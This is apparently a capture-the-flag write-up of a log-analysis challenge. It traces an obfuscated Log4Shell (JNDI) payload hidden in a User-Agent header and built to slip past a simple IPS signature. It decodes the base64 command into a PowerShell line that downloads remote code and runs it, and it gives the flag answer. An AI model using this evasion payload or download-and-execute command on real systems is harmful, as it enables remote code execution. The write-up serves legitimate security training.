Statement: We implemented a basic IPS to help protect our site from new attacks.

Somehow, a newer more sophisticated version of a regularly observed attack was successfully executed against the website.

What is the name of the script that was run?

Flag format: Name of the script that was run, case sensitive.

The challenge provides a JSON file containing logs.

These logs and scenarios are designed to be real-ish; they are simpler than production data, and since the entire data set covers one hour, all malicious activity is condensed into that time frame.

Searching the logs, I notice a log4j (Log4Shell) exploit attempt carried in the User-Agent header:

    "_time": "2021-01-01T09:29:13.000+0000",
    "origin": "",
    "site": "",
    "method": "GET",
    "referer": "",
    "useragent": "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://}",
    "url": "",
    "logSource": "Http:Web"

Each `${::-x}` is a Log4j lookup with an empty key and a default value of `x`, so when Log4j evaluates the header the string resolves to `${jndi:ldap://...}`. That is the "more sophisticated version": an IPS signature that only matches the literal `${jndi:` never sees it. The command carried by the payload is base64 encoded, so I decode it to read the content and get the name of the script:

    echo "cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZG93bnVuZGVyY3RmLmNvbS9wVENOcDVwNkxQMGQ3cUE3N3l2YjRTSGY0MCcpOyI=" | base64 -d

Decoded payload (the URL is exactly what the base64 above decodes to):

    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://downunderctf.com/pTCNp5p6LP0d7qA77yvb4SHf40');"

The script name is the last path segment of that URL.

Flag: pTCNp5p6LP0d7qA77yvb4SHf40